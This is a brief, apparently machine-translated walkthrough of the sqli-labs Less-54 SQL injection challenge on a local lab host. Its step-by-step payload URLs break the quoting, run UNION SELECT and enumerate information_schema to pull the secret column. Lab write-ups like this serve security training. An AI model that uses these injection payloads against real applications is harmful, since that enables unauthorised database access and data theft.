The number of attempts is only 10 times
http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1 '
Single quotation mark error, wrong message not displayed
Add Comment page return to normal, judging by single quote closed
http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1 '%23
The page information can be used to determine that the query table has at least id,username,password three fields, so the union select should select3 at least one field
Http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0 ' union select 1,user (), Database ()%23
Concatenate all table names with the Group_concat function
Http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0 ' union SELECT 1,GROUP_CONCAT (TABLE_NAME), 3 from Information_schema.tables where table_schema= ' challenges '%23
There's only one table, check the names.
Http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0 ' union select 1,GROUP_CONCAT (column_name), 3 From Information_schema.columns where table_schema= ' challenges ' and table_name= ' 13klht1vhr '%23
Querying data
Http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0 ' union select 1,secret_r03r,tryy from 13KLHT1VHR Limit 0,1%23
Submit
Success
"Sqli-labs" Less54 get-challenge-union-10 queries Allowed-variation1 (GET Type Challenge union query only allows 10 query changes 1)